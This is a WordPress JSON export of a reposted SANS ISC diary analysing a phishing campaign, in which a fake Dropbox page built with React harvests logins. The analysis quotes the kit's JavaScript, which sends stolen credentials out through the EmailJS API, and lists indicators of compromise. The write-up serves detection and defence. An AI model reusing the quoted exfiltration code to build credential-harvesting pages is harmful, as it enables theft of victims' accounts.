{"id":1895,"date":"2026-03-13T09:01:10","date_gmt":"2026-03-13T09:01:10","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/"},"modified":"2026-03-13T09:01:10","modified_gmt":"2026-03-13T09:01:10","slug":"a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/","title":{"rendered":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)"},"content":{"rendered":"
\n

On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection.<\/p>\n

But before we get to the details, let\u2019s take a quick look at the initial message.\u00a0The e-mail pretended to be a notification about a list of files shared with us through the legitimate WeTransfer service.<\/p>\n

I mentioned that the lure used in the message was of low-quality because, as you can see in the following image, the files in question were supposedly sent by someone using our own e-mail address\u2026 Which would probably be at least a little suspicious to any recipient.<\/p>\n

\"\"<\/a><\/p>\n

The body of the message included a list of files that were supposedly part of the transfer \u2013 in total the message claimed that 76 items with a combined size of 1010 MB were shared with us (or with the intended victim, to be more general).<\/p>\n

Messages of this type are quite ubiquitous and the only reason why I decided to spend any time on this one was the link it contained. It pointed to the following URL:<\/p>\n

\nhxxps[:]\/\/crimson-pine-6e12[.]gstmfhxzvbxk[.]workers[.]dev\/?%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%B0=handlers@isc.sans.edu()Dropbox%20Community<\/code><\/pre>\n
Embedding the recipient\u2019s e-mail address in the query string is something we see fairly frequently in phishing campaigns, but the ending of the parameter string with \u201c()Dropbox Community\u201d caught my attention.<\/p>\n
Another small detail that somewhat stood out was the encoded portion at the beginning of the query parameter, which used percent-encoded UTF-8 byte sequences that did not correspond to standard ASCII characters.<\/p>\n
\n%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%B0<\/code><\/pre>\n
When decoded, the first characters correspond to Cyrillic letters, specifically:<\/p>\n
\"\"<\/p>\n
This appears to be a truncated fragment of the Russian word for a program:<\/p>\n
\"\"<\/p>\n
The reason for including this fragment is unclear, but it provides an indicator of the language the authors of the phishing might have spoken (since one wouldn\u2019t expect any false-flag attempts in a generic phishing campaign such as this one).<\/p>\n
As you may have noted, the link used in the message pointed to a Cloudflare Workers domain (workers.dev), which, apart from its legitimate use, has become a convenient hosting platform for short-lived malicious infrastructure in recent years[1<\/a>,2<\/a>].<\/p>\n
The link led to a fake Dropbox Transfer page showing what appeared to be a file download portal with a list of documents displayed over a looping video.<\/p>\n
\"\"<\/a><\/p>\n
Selecting any of the download options resulted in a login prompt requesting the user\u2019s e-mail address and password before access to the files would (supposedly) be granted.<\/p>\n
\"\"<\/a><\/p>\n
While the user interface itself was fairly typical for a phishing page, its structure was somewhat more interesting.<\/p>\n
Inspecting the page source revealed that the HTML document was almost empty and consisted mainly of a single placeholder element together with a reference to a JavaScript bundle main.90eaa1b0.js<\/em>\u00a0(the additional hidden elements were unrelated to the visible interface and were likely artifacts of the phishing kit or simple attempts to evade automated scanning).<\/p>\n
\n<!doctype html>\n<html lang=\"en\">\n<head>\n...\n<title>Dropbx - Collaboration Document<\/title>\n<script defer=\"defer\" src=\"\/static\/js\/main.90eaa1b0.js\">\n<\/script>\n<link href=\"\/static\/css\/main.3a3f297d.css\" rel=\"stylesheet\">\n<\/head>\n<body>\n<noscript>You need to enable JavaScript to run this app.<\/noscript>\n<div class=\"hello_world\">\n<\/div>\n<div id=\"root\">\n<\/div>\n<div class=\"laravel_php\">\n<p style=\"display:none!important\">hello_world<\/p>\n<\/div>\n<div class=\"os_webkit_moz_ms_fox\">\n<h1 style=\"display:none!important\">Introduction<\/h1>\n<\/div>\n<div class=\"kungfu_panda_\">\n<p style=\"display:none!important\">hello_world<\/p>\n<\/div>\n<\/body>\n<\/html><\/code><\/pre>\n
This indicated that the page was implemented as a single-page web application, where the interface was supposed to be rendered dynamically in the browser. This approach is much less common in phishing kits than static HTML pages and can somewhat complicate analysis if an analyst relies only on a landing page source code.<\/p>\n
Opening the referenced JavaScript bundle confirmed the hypothesis and showed that the page was built using React[3<\/a>], since it contained the React runtime together with the application code. Typical runtime identifiers appeared throughout the file, as you can see in the following image.<\/p>\n
\"\"<\/a><\/p>\n
The entire phishing interface was therefore rendered dynamically once the JavaScript bundle executed and attached itself to the root HTML element.<\/p>\n
The most interesting portion of the code appeared in the logic responsible for submitting the login form. The bundle contained a call to the EmailJS service[4<\/a>], which allows web applications to send e-mails via its API directly from client-side JavaScript.<\/p>\n
The three following code fragments show the relevant functionality:<\/p>\n
    \n
  1. Code responsible for sending a POST request to the EmailJS API\n
    \nconst D={origin:\"https:\/\/api.emailjs.com\", ...}\n\nH=async function(e,t){\n  ...\n  const r=await fetch(D.origin+e,{method:\"POST\",headers:n,body:t}),\n  ...\n}<\/code><\/pre>\n
    \u00a0<\/p>\n<\/li>\n
  2. Definition of a routine that builds the POST request body\n
    \nX=async(e,t,n,r)=>{\n  const l=F(r),\n        a=l.publicKey||D.publicKey,\n        ...\n  ...\n  f.append(\"lib_version\",\"4.4.1\"),\n  f.append(\"service_id\",e),\n  f.append(\"template_id\",t),\n  f.append(\"user_id\",a),\n  H(\"\/api\/v1.0\/email\/send-form\",f)\n}<\/code><\/pre>\n
    \u00a0<\/p>\n<\/li>\n
  3. Code that supplies parameters for the POST request (strings inside this excerpt are EmailJS inputs \u2013 \u201cservice_t8yu1k1\u201d is a service ID, \u201ctemplate_vszijae\u201d is a template ID and the constant \u201ce\u201d contains a public API key)\n
    \nconst e=\"Z2Y07-t9AET4hviRq\";\nif(\n  X(\"service_t8yu1k1\",\"template_vszijae\",r.current,{publicKey:e}).then((()=>{console.log(\"a\")}),(e=>{console.log(\"e\")})),\n  ...\n)<\/code><\/pre>\n
    \u00a0<\/p>\n<\/li>\n<\/ol>\n
    Using this code, any credentials entered by a victim would be collected and transmitted through the EmailJS API.<\/p>\n
    It should further be mentioned that the JS code also queried the Geoapify IP information API[5<\/a>] to gather geographic metadata about the victim, which was then intended to be sent to the attackers along with the harvested credentials.<\/p>\n
    After the form submission the page would redirect the victim to the legitimate website (Dropbox), as is usual in similar circumstances.<\/p>\n
    Although the entire campaign is basically just a run-of-the-mill credential harvesting operation, from a technical standpoint, the phishing kit used is quite interesting. Both because the implementation through a React application bundled into a single JavaScript file can potentially be effective in evading simple security filters on web proxies that rely only on static HTML analysis, but also due to use of a legitimate third-party service for credential exfiltration instead of an attacker-controlled infrastructure.<\/p>\n
    IoCs<\/strong>
    \nPhishing domain:<\/u>
    \ncrimson-pine-6e12.gstmfhxzvbxk.workers.dev
    \nEmailJS identifiers:<\/u>
    \nservice_t8yu1k1
    \ntemplate_vszijae<\/p>\n
    [1] https:\/\/developers.cloudflare.com\/workers\/<\/a>
    \n[2]     https:\/\/www.fortra.com\/blog\/cloudflare-pages-workers-domains-increasingly-abused-for-phishing<\/a>
    \n[3]     https:\/\/react.dev\/<\/a>
    \n[4]     https:\/\/www.emailjs.com\/docs\/<\/a>
    \n[5]     https:\/\/www.geoapify.com\/ip-geolocation-api\/<\/a><\/p>\n
    ———–
    \nJan Kopriva
    \n    LinkedIn<\/a>
    \n    Nettles Consulting<\/a><\/p>\n
     (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"
    On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection. But before […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-1895","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nA React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection. But before […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-03-13T09:01:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)\",\"datePublished\":\"2026-03-13T09:01:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\"},\"wordCount\":959,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\",\"name\":\"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png\",\"datePublished\":\"2026-03-13T09:01:10+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/","og_locale":"en_US","og_type":"article","og_title":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited","og_description":"On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection. But before […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-03-13T09:01:10+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)","datePublished":"2026-03-13T09:01:10+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/"},"wordCount":959,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/","name":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png","datePublished":"2026-03-13T09:01:10+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/26-03-17-phish.png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/13\/a-react-based-phishing-page-with-credential-exfiltration-via-emailjs-fri-mar-13th\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=1895"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/1895\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=1895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=1895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=1895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}